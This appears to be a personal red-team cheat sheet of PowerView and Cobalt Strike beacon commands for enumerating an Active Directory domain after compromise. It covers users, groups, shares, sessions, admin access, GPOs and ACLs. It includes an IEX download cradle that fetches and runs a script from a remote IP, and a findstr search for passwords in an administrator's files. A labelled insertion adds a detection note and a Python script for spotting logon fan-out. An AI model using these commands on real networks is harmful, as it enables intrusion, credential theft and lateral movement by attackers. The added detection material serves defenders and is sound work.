Hassan Saad

PowerView


Last updated 2 years ago

Enumeration

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# PowerView
IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/view.ps1');

# Domain Info
Get-Domain
Get-DomainController

# Password Policy
(Get-DomainPolicy)."SystemAccess"
Get-DomainPolicyData | select -ExpandProperty SystemAccess

# Enumerate Domain Users
Get-DomainUser | select samaccountname

# Enumerate Selected Domain User Properties
Get-DomainUser -Properties description,pwdlastset

# Get Detailed Information About Specific Domain User
Get-DomainUser -Identity user1

# Enumerate Domain Groups
Get-DomainGroup | select samaccountname

# Get Domain Groups Whose Name Contains The Word "admin"
Get-DomainGroup *admin* | select samaccountname

# Enumerate Domain Computers
Get-DomainComputer | select cn
Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName

# Enumerate Domain Computers That Respond To Ping Requests
Get-DomainComputer -Ping | select cn

# Enumerate Domain OUs
Get-DomainOU | select name

# Enumerate Domain Group Members
Get-DomainGroupMember -Identity "Domain Admins"

# Enumerate Nested Group Members (Recursive)
Get-DomainGroupMember -Identity "Domain Admins" -RecurseUsingMatchingRule | select groupname,membername,memberobjectclass

# Enumerate The Groups a User Is a Member Of
Get-DomainGroup -MemberIdentity 'hsaad' | select samaccountname,memberof

Open Shares

# Enumerate Open Shares
Get-NetShare -ComputerName WorkStation1

# Enumerate Open Shares on All Domain Computers (Get-DomainComputer + Get-NetShare)
Find-DomainShare

# Enumerate Open Shares That You Have Read Access To
Find-DomainShare -CheckShareAccess

# Search For Interesting Files Inside Shares
Find-InterestingFile -Path \\workstation1\c$\

# Search For Interesting Keywords Inside Files on Shares
findstr /spin /c:"password" \\workstation1\c$\users\administrator\*.txt

# Find Interesting Domain Share Files (Get-DomainComputer + Get-NetShare + Find-InterestingFile)
Find-InterestingDomainShareFile -Verbose

Local Groups

# Enumerate Local Groups on Computer WorkStation1
Get-NetLocalGroup -ComputerName WorkStation1

# Enumerate Local Group Members Of Administrators Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Administrators"

# Enumerate Local Group Members Of Remote Desktop Users Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Remote Desktop Users"

# Enumerate Local Group Members on All Domain Computers (Get-DomainComputer + Get-NetLocalGroupMember)
Find-DomainLocalGroupMember -GroupName "Administrators"

Local Admin Access

# Test Admin Access Rights on a Computer
Test-AdminAccess -ComputerName workstation1

# Test Admin Access Rights on All Domain Computers (Get-DomainComputer + Test-AdminAccess)
Find-LocalAdminAccess -Verbose

User Hunting

# Enumerate Users Sessions (Reference: https://www.youtube.com/watch?v=q86VgM2Tafc)
Get-NetSession -ComputerName WorkStation1

# Enumerate LoggedOn Users
Get-NetLoggedon -ComputerName workstation1

# Get Domain Admins + Run Get-NetSession/Get-NetLoggedon on Every Domain Computer + Compare The Results
Find-DomainUserLocation

# Perform Against High-Traffic Servers Only (Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController)
Find-DomainUserLocation -Stealth

# Run Get-NetSession/Get-NetLoggedon on Every Domain Computer, Then Print All The Results
Find-DomainUserLocation -ShowAll

# Perform Against Different Users or Groups
Find-DomainUserLocation -UserGroupIdentity "local_admin"
Find-DomainUserLocation -UserIdentity "ITSupport"
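Detection-side note, added here and not part of the original page: Find-LocalAdminAccess and Find-DomainUserLocation reach every domain computer from one host in quick succession, so a burst of network logons (Security event 4624, logon type 3) by one account from one source IP to many distinct hosts within minutes is the footprint to alert on. The script below is an added Python example over constructed sample events; the field layout, window size and host threshold are assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of centrally collected 4624 events (not real logs).
# Columns: timestamp, target host, account, source IP, logon type.
SAMPLE_4624 = r"""
2024-01-10T09:00:01,WS01,CORP\hsaad,10.0.0.50,3
2024-01-10T09:00:02,WS02,CORP\hsaad,10.0.0.50,3
2024-01-10T09:00:03,WS03,CORP\hsaad,10.0.0.50,3
2024-01-10T09:00:03,FS01,CORP\hsaad,10.0.0.50,3
2024-01-10T09:00:04,WS04,CORP\hsaad,10.0.0.50,3
2024-01-10T09:00:05,DC01,CORP\hsaad,10.0.0.50,3
2024-01-10T09:00:06,WS05,CORP\hsaad,10.0.0.50,2
2024-01-10T09:01:00,FS01,CORP\jdoe,10.0.0.61,3
2024-01-10T09:02:00,WS07,CORP\jdoe,10.0.0.61,3
2024-01-10T09:10:00,WS01,CORP\svc_backup,10.0.0.9,3
2024-01-10T09:25:00,WS02,CORP\svc_backup,10.0.0.9,3
2024-01-10T09:40:00,WS03,CORP\svc_backup,10.0.0.9,3
2024-01-10T09:55:00,WS04,CORP\svc_backup,10.0.0.9,3
2024-01-10T10:10:00,WS05,CORP\svc_backup,10.0.0.9,3
2024-01-10T10:25:00,FS01,CORP\svc_backup,10.0.0.9,3
"""

def parse_events(text):
    """Parse the CSV-style lines into (time, host, account, src_ip, logon_type)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, account, src, ltype = line.split(",")
        events.append((datetime.fromisoformat(ts), host, account, src, int(ltype)))
    return events

def find_fanout(events, window=timedelta(minutes=5), min_hosts=5):
    """Return {(account, src_ip): [hosts]} for every principal that produced
    network logons (type 3) to at least min_hosts distinct hosts inside one
    sliding window. Interactive logons (type 2) are ignored as noise here."""
    by_actor = defaultdict(list)
    for ts, host, account, src, ltype in events:
        if ltype == 3:
            by_actor[(account, src)].append((ts, host))
    hits = {}
    for actor, logons in by_actor.items():
        logons.sort()
        start = 0
        for end in range(len(logons)):
            # Advance the window start until the span fits inside `window`.
            while logons[end][0] - logons[start][0] > window:
                start += 1
            hosts = {h for _, h in logons[start:end + 1]}
            if len(hosts) >= min_hosts and len(hosts) > len(hits.get(actor, ())):
                hits[actor] = sorted(hosts)
    return hits

if __name__ == "__main__":
    for (account, src), hosts in find_fanout(parse_events(SAMPLE_4624)).items():
        print(f"fan-out: {account} from {src} -> {len(hosts)} hosts: {hosts}")
```

With the defaults only the hsaad burst fires; the slow, spread-out svc_backup logons only trip the check if the window is widened to hours, which is the knob that separates scheduled jobs from an enumeration sweep.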

Domain Group Policy

# Enumerate All Domain Group Policies
Get-DomainGPO | select DisplayName
Get-DomainGPO -Name "{AD7EE1ED-CDC8-4994-AE0F-50BA8B264829}" -Properties DisplayName

# Enumerate All Domain Group Policies Applied To This Computer
Get-DomainGPO -ComputerName WorkStation1

# Enumerate Local Admin Access Through Domain Group Policies
# Get-DomainGPO + Search For \SecEdit\GptTmpl.inf AND \Preferences\Groups\Groups.xml
Get-DomainGPOLocalGroup -Verbose

Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName

ACL

# Enumerate All Domain ACLs That Grant Modification Rights To Non-Built-In Principals
Find-InterestingDomainAcl -ResolveGUIDs | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN

SharpView

https://github.com/tevora-threat/SharpView

beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Debug\SharpView.exe Get-Domain